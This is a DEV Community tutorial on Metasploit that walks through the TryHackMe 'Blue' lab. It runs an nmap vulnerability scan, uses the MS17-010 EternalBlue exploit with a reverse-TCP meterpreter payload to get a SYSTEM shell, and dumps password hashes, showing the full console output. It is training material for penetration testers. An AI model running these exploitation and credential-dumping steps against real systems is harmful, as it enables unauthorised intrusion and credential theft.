DEV Community

Cover image for Metasploit explained for pentesters
Grzegorz Piechnik
Grzegorz Piechnik

Posted on • Edited on

Metasploit explained for pentesters

Metasploit, a tool for penetration testing and cracking the security of ICT systems, is one of the most well-known open source projects in the security world. In this article, we will take a look at how to navigate its interface and use its main functionalities.

The first launch

      .:okOOOkdc'           'cdkOOOko:.                                                                                                              
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.                                                                                                            
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:                                                                                                           
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'                                                                                                          
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo                                                                                                          
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx                                                                                                          
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl                                                                                                          
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.                                                                                                          
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc                                                                                                           
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo                                                                                                            
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl                                                                                                             
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;                                                                                                              
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.                                                                                                               
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,                                                                                                                 
           :kk;.OOOOOOOOOOOOO.;Ok:                                                                                                                   
             ;kOOOOOOOOOOOOOOOk:                                                                                                                     
               ,xOOOOOOOOOOOx,                                                                                                                       
                 .lOOOOOOOl.                                                                                                                         
                    ,dOd,                                                                                                                            
                      .                                                                                                                              

       =[ metasploit v6.1.4-dev                           ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Display the Framework log using the 
log command, learn more with help log

msf6 > 
Enter fullscreen mode Exit fullscreen mode

The first time we run it, we get information about the available number of exploits, auxiliaries and other scripts. What exactly are they?

  • Exploits - these are modules which use payload. When working with msf we will use them most often,
  • auxiliary - a module that takes into account all available scanners, fuzzers, sniffers, etc.,
  • post - a module used for post exploitation of the machine,
  • payloads - scripts used to interact with the hacked system. There are three types of payloads - singles, staged and stages. They differ in their level of sophistication,
  • encoders - in the case of penetration testing, our attempted attacks can be detected by security software. This can lead to the attacker wasting his time. To avoid this, encoders are used. Their task is to hide the exploit in such a way that it ib undetected,
  • nops - these are No Operation instructions, which simply move the execution of the program to the next memory address. We use nops to reach the desired location in memory addresses,
  • evasion - a module used to create payloads that bypass antivirus software.

Metasploit in practice

To better be able to focus on explaining the entire process of working with metasploit, all the commands used in the example can be found at the end of the article in the "cheatsheet" section.

The machine we will be attacking is the blue machine available on tryhackme. We start by running it and scanning all available ports, and then run the vulnerability scanner. We could use one of the available auxiliary modules to check the ports, but undoubtedly the best tool for this would be nmap - no need to complicate your life unnecessarily. If you don't already know how it works, we recently inserted an extensive article about it.

┌──(figaro㉿kali)-[~]
└─$ nmap --script vuln  10.10.160.42
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 15:15 EST
Nmap scan report for 10.10.160.42
Host is up (0.062s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
| rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  unknown
49160/tcp open  unknown

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 97.72 seconds
Enter fullscreen mode Exit fullscreen mode

This way we get information about potential vulnerabilities of the attacked machine. So let's try to find one of them in the metasploit database.

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
Enter fullscreen mode Exit fullscreen mode

Next, we will use the auxiliary scanner (auxiliary) and display its options to see what we get in the results.

msf6 > use auxiliary/scanner/smb/smb_ms17_010 
msf6 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                             Required  Description
   ----         ---------------                             --------  -----------
   CHECK_ARCH   true                                        no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                        no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                       no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordl  yes       List of named pipes to check
                ists/named_pipes.txt
   RHOSTS                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U
                                                                      sing-Metasploit
   RPORT        445                                         yes       The SMB service port (TCP)
   SMBDomain    .                                           no        The Windows domain to use for authentication
   SMBPass                                                  no        The password for the specified username
   SMBUser                                                  no        The username to authenticate as
   THREADS      1                                           yes       The number of concurrent threads (max one per host)
Enter fullscreen mode Exit fullscreen mode

As you can see, you need to specify the RHOSTS variable before proceeding - let's do that, and then run the scanner.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.160.42
rhosts => 10.10.160.42
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 10.10.160.42:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.160.42:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Enter fullscreen mode Exit fullscreen mode

Metasploit has confirmed that the host is vulnerable to the ms17-010 EternalBlue exploit. The next thing we will try to accomplish is to run the targeted exploit to compromise the machine. Before that, we again need to pinpoint the attacked RHOST.

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
mmsf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.160.42
RHOSTS => 10.10.160.42
Enter fullscreen mode Exit fullscreen mode

In addition, if you are using a VPN, you will need to set the LHOST variable.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.9.6.223
LHOST => 10.9.6.223
Enter fullscreen mode Exit fullscreen mode

Now it remains for us to run the exploit with the run or exploit command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.9.6.223:4444 
[*] 10.10.21.28:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.21.28:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.21.28:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.21.28:445 - The target is vulnerable.
[*] 10.10.21.28:445 - Connecting to target for exploitation.
[+] 10.10.21.28:445 - Connection established for exploitation.
[+] 10.10.21.28:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.21.28:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.21.28:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.21.28:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.21.28:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.21.28:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.21.28:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.21.28:445 - Sending all but last fragment of exploit packet
[*] 10.10.21.28:445 - Starting non-paged pool grooming
[+] 10.10.21.28:445 - Sending SMBv2 buffers
[+] 10.10.21.28:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.21.28:445 - Sending final SMBv2 buffers.
[*] 10.10.21.28:445 - Sending last fragment of exploit packet!
[*] 10.10.21.28:445 - Receiving response from exploit packet
[+] 10.10.21.28:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.21.28:445 - Sending egg to corrupted connection.
[*] 10.10.21.28:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.21.28
[*] Meterpreter session 9 opened (10.9.6.223:4444 -> 10.10.21.28:49169) at 2021-11-23 18:56:55 -0500
[+] 10.10.21.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.21.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.21.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 
Enter fullscreen mode Exit fullscreen mode

As you can see, we are in the meterpreter shell by default. What is it? It is one of the payloads of the metasploit attack, which ultimately allows us to explore the machine without leaving any traces. So let's try changing the shell from meterpreter to shell. First, re-enter metasploit with the background command - this does not kill the active session. Their full list can be viewed with the sessions command.

meterpreter > background
[*] Backgrounding session 9...
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  9         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.9.6.223:4444 -> 10.10.21.28:49169 (10.10.21.28)
Enter fullscreen mode Exit fullscreen mode

To use shell instead of meterpreter, we can use one of the post module scripts - shell_to_meterpreter.

msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter 
msf6 post(multi/manage/shell_to_meterpreter) > show options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.
Enter fullscreen mode Exit fullscreen mode

In order for the script to work properly, we need to complete the SESSION variable. From the previous command, we know that the id of the session we are interested in is equal to 9.

msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 9
SESSION => 9
Enter fullscreen mode Exit fullscreen mode

What remains is to run the module. Or, instead of using the post module, we can simply type the shell command in the meterpreter.

meterpreter > shell
Process 2064 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
Enter fullscreen mode Exit fullscreen mode

We can see that we have escalated to NT authority, which is the local system account. This gives us unlimited access to all local system resources.

The next challenge is to find a non-default user and crack his password. To list all users with their passwords, we will use the hashdump command.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Enter fullscreen mode Exit fullscreen mode

Now it remains to crack the password using, for example, the John the ripper tool and to find hidden flags in system files - we will not go through this step by step, as this is not the intention of the current article.

Cheatsheet

  • search <regex> - search for a module by the indicated regex,
  • use exploit/<exploitPath> - indicate the exploit we will want to use,
  • set <payload> - set the payload,
  • options - display options for the currently used module,
  • set <option> <value> - set the value for the selected option,
  • exploit / run - run the previously selected exploit / module.

Sources

https://www.metasploit.com/
https://www.offensive-security.com/metasploit-unleashed/
https://www.tutorialspoint.com/metasploit/metasploit_payload.html
https://github.com/security-cheatsheet/metasploit-cheat-sheet
https://tryhackme.com/room/blue
https://github.com/openwall/john

Top comments (0)